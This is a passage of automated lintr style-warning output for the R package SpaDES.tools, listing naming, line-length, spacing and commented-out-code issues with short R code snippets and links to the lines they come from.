wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:813:29:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L813) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​setGeneric(\"wrap\", function(X, bounds, withHeading) {\n                            ^\n```\n[R/neighbourhood.R:822:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L822) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:839:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L839) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:849:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L849) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:850:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L850) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    X <- wrap(X, bounds = extent(bounds))\n    ^\n```\n[R/neighbourhood.R:859:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L859) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:860:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L860) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    X <- wrap(X, bounds = extent(bounds))\n    ^\n```\n[R/neighbourhood.R:869:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L869) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:872:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L872) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds))\n      ^\n```\n[R/neighbourhood.R:884:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L884) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:909:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L909) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:910:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L910) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds), withHeading = withHeading)\n      ^\n```\n[R/neighbourhood.R:919:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L919) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:922:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L922) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds), withHeading = withHeading)\n      ^\n```\n[R/neighbourhood.R:1059:40:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/neighbourhood.R#L1059) *style:* **Commas should always have a space after.**\n```r\n​  cc <- cbind(pureCircle2[, \"x\"] - xy[,\"x\"], pureCircle2[, \"y\"] - xy[, \"y\"])\n                                       ^\n```\n[R/probability.R:41:35:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/probability.R#L41) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    1 / sqrt(var * 2 * pi) * exp(-((theta - mu + 2 * pi * k) ^ 2) / (2 * var))\n                                  ^\n```\n[R/probability.R:44:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/probability.R#L44) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Next <- term(theta, mu, var, k)\n  ^~~~\n```\n[R/probability.R:45:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/probability.R#L45) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Last <- Next\n  ^~~~\n```\n[R/RcppExports.R:68:20:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/RcppExports.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​runifC <- function(N) {\n                   ^\n```\n[R/RcppExports.R:71:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/RcppExports.R#L71) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/SELES.R:53:23:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/SELES.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​numAgents <- function(N, probInit) {\n                      ^\n```\n[R/splitRaster.R:116:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/splitRaster.R#L116) *style:* **Lines should not be more than 100 characters.**\n```r\n​      clusterApplyLB(cl = cl, x = seq_along(extents), fun = croppy, e = extents, r = r, path = path, rType = rType)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:538:8:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/spread.R#L538) *style:* **Commented code should be removed.**\n```r\n​      #isNASpreadProb <- is.na(spreadProb[])\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:540:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/spread.R#L540) *style:* **Commented code should be removed.**\n```r\n​      #   isNASpreadProb <- is.na(spreadProb[])\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:541:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/spread.R#L541) *style:* **Commented code should be removed.**\n```r\n​      #   spreadProb[isNASpreadProb] <- 0L\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:942:41:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/spread.R#L942) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​              notDupsEvents <- notDups[-(1:(nrSpreads - nrPotentials))]\n                                        ^\n```\n[R/spread2.R:5:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/spread2.R#L5) *style:* **Lines should not be more than 100 characters.**\n```r\n​                           \"quantityAdj\", \"quantityAdj2\", \"state\", \"size\", \"tooBigByNCells\", \"V1\", \"proportion\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:674:12:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/spread2.R#L674) *style:* **Commented code should be removed.**\n```r\n​          #pureCircle <- unique(pureCircle)\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:759:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/spread2.R#L759) *style:* **Commented code should be removed.**\n```r\n​          # colnamesDtPot <- colnames(dtPotential)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:760:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/spread2.R#L760) *style:* **Commented code should be removed.**\n```r\n​          # ll <-  lapply(colnamesDtPot, function(x) dtPotential[[x]][!spreadProbNA])\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:761:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/spread2.R#L761) *style:* **Commented code should be removed.**\n```r\n​          # names(ll) <- colnamesDtPot\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:762:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/spread2.R#L762) *style:* **Commented code should be removed.**\n```r\n​          # dtPotential <- as.data.table(ll)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:772:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/spread2.R#L772) *style:* **Lines should not be more than 100 characters.**\n```r\n​                                                                   .I[sample.int(length(numNeighs), size = numNeighs, prob = spreadProbRel)],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:787:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/spread2.R#L787) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      NAaSP <- !is.na(actualSpreadProb)\n      ^~~~~\n```\n[R/spread2.R:789:42:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/spread2.R#L789) *style:* **Commas should always have a space after.**\n```r\n​        dtPotential <- dtPotential[NAaSP,]\n                                         ^\n```\n[R/spread2.R:830:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/spread2.R#L830) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # this is to prevent overlap within an event... in some cases, overlap within event is desired, so skip this block\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:848:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/spread2.R#L848) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #successCells <- na.omit(successCells[!dupsWithinDtPotential]) # remove the dupsWithinDtPotential\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:848:10:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/R/spread2.R#L848) *style:* **Commented code should be removed.**\n```r\n​        #successCells <- na.omit(successCells[!dupsWithinDtPotential]) # remove the dupsWithinDtPotential\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:6:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-examples.R#L6) *style:* **Commented code should be removed.**\n```r\n​    cat(\"#START##############\\n\", file = tmpExFile, append = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:17:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-examples.R#L17) *style:* **Commas should never have a space before.**\n```r\n​  } , add = TRUE)\n   ~^\n```\n[tests/testthat/test-mapReduce.R:23:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L23) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(sort(unique(getValues(biomass))), sort(reducedDT$biomass))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:27:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L27) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:28:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L28) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:31:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L31) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:35:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L35) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0,15,0,15), res=1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:36:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L36) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes=5, speedup=1, p=0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:37:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L37) *style:* **Commented code should be removed.**\n```r\n​#   names(fullRas) <- \"mapcodeAll\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:38:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L38) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:42:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L42) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu=4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:44:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L44) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:46:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L46) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(biomass))), sort(reducedDT$biomass))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:47:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L47) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(biomass))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:49:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L49) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:50:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L50) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:51:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L51) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(communities))), sort(reducedDT$communities))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:52:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L52) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(communities))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:56:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L56) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:57:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L57) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:60:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L60) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:64:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L64) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0, 15, 0, 15), res = 1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:65:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L65) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes = 5, speedup = 1, p = 0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:67:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L67) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:71:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L71) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu = 4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:73:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L73) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:75:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L75) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:76:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L76) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:77:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L77) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(communities))), sort(reducedDT$communities))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:81:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L81) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:82:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L82) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:85:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L85) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:89:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L89) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0,15,0,15), res=1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:90:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L90) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes=5, speedup=1, p=0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:91:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L91) *style:* **Commented code should be removed.**\n```r\n​#   names(fullRas) <- \"mapcodeAll\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:92:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L92) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:96:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L96) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu=4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:98:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L98) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:100:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L100) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:101:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L101) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:102:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-mapReduce.R#L102) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(communities))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-randomPolygon.R:25:60:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-randomPolygon.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​  expect_true(base::abs(base::abs(polyArea - area)) <  area/4) ## TODO: why is this area/4?\n                                                          ~^~\n```\n[tests/testthat/test-splitRaster.R:148:38:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-splitRaster.R#L148) *style:* **Commas should always have a space after.**\n```r\n​  expect_identical(dataType(y4[[1]]),\"INT1U\")\n                                     ^\n```\n[tests/testthat/test-splitRaster.R:165:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/efd60db0c828812e50332857434b2bc2727c0da4/tests/testthat/test-splitRaster.R#L165) *style:* **Lines should not be more than 100 characters.**\n```r\n​    tmpdir <- file.path(tempdir(), \"splitRaster-test-parallel\") %>% 